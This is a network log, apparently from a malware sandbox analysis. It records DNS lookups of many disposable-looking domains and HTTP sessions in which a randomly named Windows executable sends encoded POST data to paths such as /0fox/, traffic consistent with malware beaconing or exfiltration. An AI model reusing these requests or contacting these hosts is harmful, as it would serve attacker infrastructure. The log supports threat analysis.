                                                                                                                    Nov 2, 2024 20:01:43.348125935 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.348125935 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.348136902 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.348140001 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.348172903 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.348988056 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.348998070 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.349009037 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.349028111 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.349051952 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.446211100 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.464835882 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:43.464926958 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.467943907 CET5004680192.168.2.434.92.248.216
                                                                                                                    Nov 2, 2024 20:01:43.472780943 CET805004634.92.248.216192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:57.098221064 CET5004780192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:57.103163004 CET805004745.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:57.103995085 CET5004780192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:57.115925074 CET5004780192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:57.120758057 CET805004745.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:57.806106091 CET805004745.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:57.843477011 CET805004745.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:57.843633890 CET5004780192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:58.627907038 CET5004780192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:59.653266907 CET5004880192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:59.658309937 CET805004845.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:59.658380032 CET5004880192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:59.669605017 CET5004880192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:01:59.674582958 CET805004845.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:00.360003948 CET805004845.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:00.396482944 CET805004845.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:00.399991035 CET5004880192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:01.174767971 CET5004880192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:02.192821980 CET5004980192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:02.197786093 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.197880983 CET5004980192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:02.212011099 CET5004980192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:02.216979980 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.216994047 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217001915 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217041016 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217051029 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217057943 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217350006 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217358112 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.217366934 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.918272972 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.953728914 CET805004945.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:02.955965996 CET5004980192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:03.830190897 CET5004980192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:04.880454063 CET5005080192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:04.886682987 CET805005045.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:04.890234947 CET5005080192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:04.901998043 CET5005080192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:04.907783031 CET805005045.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:05.834609032 CET805005045.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:05.834719896 CET805005045.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:05.834986925 CET805005045.56.219.238192.168.2.4
                                                                                                                    Nov 2, 2024 20:02:05.835120916 CET5005080192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:05.837943077 CET5005080192.168.2.445.56.219.238
                                                                                                                    Nov 2, 2024 20:02:05.842744112 CET805005045.56.219.238192.168.2.4
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 2, 2024 19:58:54.013742924 CET5763653192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:58:54.026479959 CET53576361.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:58:59.036932945 CET5794553192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:58:59.049020052 CET53579451.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:14.958951950 CET5783053192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:59:15.111428976 CET53578301.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:28.520926952 CET5339053192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:59:28.546509027 CET53533901.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:42.677870989 CET6302353192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:59:43.690010071 CET6302353192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:59:43.803241014 CET53630231.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:43.807737112 CET53630231.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:57.677771091 CET5649953192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 19:59:57.705008030 CET53564991.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:12.023724079 CET5460753192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:00:12.047338963 CET53546071.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:25.381536961 CET5608453192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:00:25.562702894 CET53560841.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:39.194195986 CET6411453192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:00:39.208899975 CET53641141.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:52.599813938 CET5439153192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:00:52.615957975 CET53543911.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:06.021456003 CET5652453192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:01:06.095571041 CET53565241.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:19.695935965 CET4958253192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:01:19.715133905 CET53495821.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:33.287302971 CET5354453192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:01:34.106122017 CET53535441.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:48.474713087 CET6298053192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:01:48.486346006 CET53629801.1.1.1192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:56.591906071 CET5233353192.168.2.41.1.1.1
                                                                                                                    Nov 2, 2024 20:01:57.093040943 CET53523331.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 2, 2024 19:58:54.013742924 CET192.168.2.41.1.1.10xc79fStandard query (0)www.dxeg.lolA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:58:59.036932945 CET192.168.2.41.1.1.10x79d1Standard query (0)www.bqberw.vipA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:14.958951950 CET192.168.2.41.1.1.10x7fe0Standard query (0)www.weatherbook.liveA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:28.520926952 CET192.168.2.41.1.1.10xc9c6Standard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:42.677870989 CET192.168.2.41.1.1.10x6c0aStandard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:43.690010071 CET192.168.2.41.1.1.10x6c0aStandard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:57.677771091 CET192.168.2.41.1.1.10xae54Standard query (0)www.crowsecurity.cloudA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:12.023724079 CET192.168.2.41.1.1.10x326eStandard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:25.381536961 CET192.168.2.41.1.1.10xe05dStandard query (0)www.technectar.topA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:39.194195986 CET192.168.2.41.1.1.10x569fStandard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:52.599813938 CET192.168.2.41.1.1.10xc6c3Standard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:06.021456003 CET192.168.2.41.1.1.10xea82Standard query (0)www.queima.shopA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:19.695935965 CET192.168.2.41.1.1.10x5ea9Standard query (0)www.rjscorp.orgA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:33.287302971 CET192.168.2.41.1.1.10x82e1Standard query (0)www.thegardenlab.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:48.474713087 CET192.168.2.41.1.1.10x573aStandard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:56.591906071 CET192.168.2.41.1.1.10x3420Standard query (0)www.technew.shopA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 2, 2024 19:58:54.026479959 CET1.1.1.1192.168.2.40xc79fName error (3)www.dxeg.lolnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:58:59.049020052 CET1.1.1.1192.168.2.40x79d1No error (0)www.bqberw.vipbqberw.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:58:59.049020052 CET1.1.1.1192.168.2.40x79d1No error (0)bqberw.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:58:59.049020052 CET1.1.1.1192.168.2.40x79d1No error (0)bqberw.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:15.111428976 CET1.1.1.1192.168.2.40x7fe0No error (0)www.weatherbook.liveweatherbook.liveCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:15.111428976 CET1.1.1.1192.168.2.40x7fe0No error (0)weatherbook.live3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:15.111428976 CET1.1.1.1192.168.2.40x7fe0No error (0)weatherbook.live15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:28.546509027 CET1.1.1.1192.168.2.40xc9c6No error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:28.546509027 CET1.1.1.1192.168.2.40xc9c6No error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:43.803241014 CET1.1.1.1192.168.2.40x6c0aNo error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:43.807737112 CET1.1.1.1192.168.2.40x6c0aNo error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:57.705008030 CET1.1.1.1192.168.2.40xae54No error (0)www.crowsecurity.cloudcrowsecurity.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:57.705008030 CET1.1.1.1192.168.2.40xae54No error (0)crowsecurity.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 19:59:57.705008030 CET1.1.1.1192.168.2.40xae54No error (0)crowsecurity.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:12.047338963 CET1.1.1.1192.168.2.40x326eNo error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:12.047338963 CET1.1.1.1192.168.2.40x326eNo error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:12.047338963 CET1.1.1.1192.168.2.40x326eNo error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:25.562702894 CET1.1.1.1192.168.2.40xe05dNo error (0)www.technectar.top199.192.21.169A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:39.208899975 CET1.1.1.1192.168.2.40x569fNo error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:39.208899975 CET1.1.1.1192.168.2.40x569fNo error (0)linkwave.cloud15.197.225.128A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:39.208899975 CET1.1.1.1192.168.2.40x569fNo error (0)linkwave.cloud3.33.251.168A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:52.615957975 CET1.1.1.1192.168.2.40xc6c3No error (0)www.bayarcepat19.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:00:52.615957975 CET1.1.1.1192.168.2.40xc6c3No error (0)www.bayarcepat19.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:06.095571041 CET1.1.1.1192.168.2.40xea82No error (0)www.queima.shopqueima.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:06.095571041 CET1.1.1.1192.168.2.40xea82No error (0)queima.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:19.715133905 CET1.1.1.1192.168.2.40x5ea9No error (0)www.rjscorp.orgrjscorp.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:19.715133905 CET1.1.1.1192.168.2.40x5ea9No error (0)rjscorp.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:19.715133905 CET1.1.1.1192.168.2.40x5ea9No error (0)rjscorp.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:34.106122017 CET1.1.1.1192.168.2.40x82e1No error (0)www.thegardenlab.net34.92.248.216A (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:48.486346006 CET1.1.1.1192.168.2.40x573aName error (3)www.timetime.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:57.093040943 CET1.1.1.1192.168.2.40x3420No error (0)www.technew.shoptechnew.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 2, 2024 20:01:57.093040943 CET1.1.1.1192.168.2.40x3420No error (0)technew.shop45.56.219.238A (IP address)IN (0x0001)false
                                                                                                                    • www.bqberw.vip
                                                                                                                    • www.weatherbook.live
                                                                                                                    • www.cc101.pro
                                                                                                                    • www.dverkom.store
                                                                                                                    • www.crowsecurity.cloud
                                                                                                                    • www.multileveltravel.world
                                                                                                                    • www.technectar.top
                                                                                                                    • www.linkwave.cloud
                                                                                                                    • www.bayarcepat19.click
                                                                                                                    • www.queima.shop
                                                                                                                    • www.rjscorp.org
                                                                                                                    • www.thegardenlab.net
                                                                                                                    • www.technew.shop
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.4497373.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:58:59.068550110 CET528OUTGET /ezjb/?InQ=l3Sp86LdHQK51JyL57ZHZ2codxeMI4L2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIR1r1RIPPBE5LFNr96UmDzREVcd4mJJ6hoQo=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.bqberw.vip
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 19:58:59.708456039 CET391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Sat, 02 Nov 2024 18:58:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 6e 51 3d 6c 33 53 70 38 36 4c 64 48 51 4b 35 31 4a 79 4c 35 37 5a 48 5a 32 63 6f 64 78 65 4d 49 34 4c 32 4f 50 61 39 53 32 65 61 63 76 68 4f 56 67 45 31 6d 70 6c 4f 6f 6a 58 79 6d 4f 5a 39 59 44 47 66 67 67 77 41 43 62 6b 39 57 6a 59 72 7a 75 48 6d 76 6f 5a 49 52 31 72 31 52 49 50 50 42 45 35 4c 46 4e 72 39 36 55 6d 44 7a 52 45 56 63 64 34 6d 4a 4a 36 68 6f 51 6f 3d 26 34 62 30 64 4d 3d 66 44 59 50 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?InQ=l3Sp86LdHQK51JyL57ZHZ2codxeMI4L2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIR1r1RIPPBE5LFNr96UmDzREVcd4mJJ6hoQo=&4b0dM=fDYPF"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.4498133.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:15.147914886 CET807OUTPOST /0fox/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.weatherbook.live
                                                                                                                    Origin: http://www.weatherbook.live
                                                                                                                    Referer: http://www.weatherbook.live/0fox/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 61 4d 45 49 6d 4c 64 52 6a 5a 35 44 56 37 42 77 57 69 49 76 30 54 7a 4a 31 57 42 74 79 76 46 33 7a 45 41 45 73 32 63 6b 43 46 58 4f 33 74 78 2b 57 6e 32 47 4a 2f 51 37 38 4c 50 45 6b 46 4f 57 56 2b 30 61 79 4a 54 41 73 33 68 6c 52 44 36 65 4e 63 4e 63 45 71 6f 62 2f 56 6d 68 2f 4c 2f 53 37 49 49 73 51 31 30 76 58 76 6d 64 70 6d 71 35 69 66 6d 34 4a 37 37 70 39 4e 5a 74 6e 54 42 73 53 5a 64 6f 2b 63 78 55 30 6a 37 4e 51 73 74 66 73 68 50 37 75 30 6e 78 32 6d 4d 35 7a 69 57 54 58 37 44 56 65 4e 31 66 76 66 37 61 61 68 67 54 47 39 75 33 51 3d 3d
                                                                                                                    Data Ascii: InQ=1AbqsGSWvjVHPaMEImLdRjZ5DV7BwWiIv0TzJ1WBtyvF3zEAEs2ckCFXO3tx+Wn2GJ/Q78LPEkFOWV+0ayJTAs3hlRD6eNcNcEqob/Vmh/L/S7IIsQ10vXvmdpmq5ifm4J77p9NZtnTBsSZdo+cxU0j7NQstfshP7u0nx2mM5ziWTX7DVeN1fvf7aahgTG9u3Q==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.4498293.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:17.692604065 CET827OUTPOST /0fox/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.weatherbook.live
                                                                                                                    Origin: http://www.weatherbook.live
                                                                                                                    Referer: http://www.weatherbook.live/0fox/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 4c 46 33 57 6f 41 48 74 32 63 70 69 46 58 61 6e 74 77 6a 6d 6e 39 47 4a 44 32 37 2b 66 50 45 67 56 4f 57 51 43 30 61 42 52 55 42 38 33 6a 70 78 44 38 44 39 63 4e 63 45 71 6f 62 2f 51 4e 68 38 37 2f 53 49 67 49 74 31 4a 33 78 48 76 35 4c 35 6d 71 39 69 66 36 34 4a 36 65 70 38 52 7a 74 68 58 42 73 54 70 64 6f 71 49 32 4e 45 6a 68 44 77 74 68 58 35 38 6b 6c 63 4e 4e 2b 48 32 35 32 41 53 77 66 78 71 5a 45 76 73 69 4e 76 37 49 48 64 6f 55 65 46 41 6e 73 54 5a 63 6c 39 44 4d 2b 44 38 50 30 58 41 76 48 47 37 2b 33 44 67 3d
                                                                                                                    Data Ascii: InQ=1AbqsGSWvjVHP6cEPBfdZjZ4M17B62jDv0PzJ36RtALF3WoAHt2cpiFXantwjmn9GJD27+fPEgVOWQC0aBRUB83jpxD8D9cNcEqob/QNh87/SIgIt1J3xHv5L5mq9if64J6ep8RzthXBsTpdoqI2NEjhDwthX58klcNN+H252ASwfxqZEvsiNv7IHdoUeFAnsTZcl9DM+D8P0XAvHG7+3Dg=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.4498423.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 19:59:20.239447117 CET10909OUTPOST /0fox/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.weatherbook.live
                                                                                                                    Origin: http://www.weatherbook.live
                                                                                                                    Referer: http://www.weatherbook.live/0fox/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 44 46 33 45 67 41 46 4f 75 63 6f 69 46 58 46 58 74 31 6a 6d 6e 61 47 4a 62 71 37 2b 43 30 45 69 64 4f 58 31 4f 30 63 77 52 55 4f 38 33 6a 30 68 44 35 65 4e 64 5a 63 45 37 6a 62 2f 41 4e 68 38 37 2f 53 4e 6b 49 71 67 31 33 7a 48 76 6d 64 70 6d 2b 35 69 66 65 34 4a 69 6f 70 2f 39 4a 34 42 33 42 70 44 35 64 75 5a 67 32 46 45 6a 2f 54 67 73 38 58 35 34 37 6c 63 52 72 2b 48 44 69 32 48 69 77 63 6c 37 47 58 4e 45 2b 4a 73 54 53 63 64 35 75 52 55 35 6c 6a 53 56 35 6c 49 58 46 69 79 73 4d 33 55 78 64 61 47 48 4a 6d 45 4b 4e 73 34 37 62 4e 6f 6c 4b 78 34 44 75 78 7a 48 50 69 52 4e 30 70 79 43 38 49 71 6f 79 4f 4b 6f 52 4f 74 70 2b 51 33 47 73 51 34 36 30 38 78 51 46 6e 4e 70 68 6a 50 44 7a 71 6a 72 2f 78 77 63 6a 73 5a 48 50 32 59 70 41 68 6e 77 64 75 79 31 5a 70 79 6d 61 6c 47 49 33 4e 73 59 78 57 79 70 6e 58 36 30 72 6c 46 66 62 38 30 6c 5a 30 34 53 36 56 66 58 70 6d 6b [TRUNCATED]
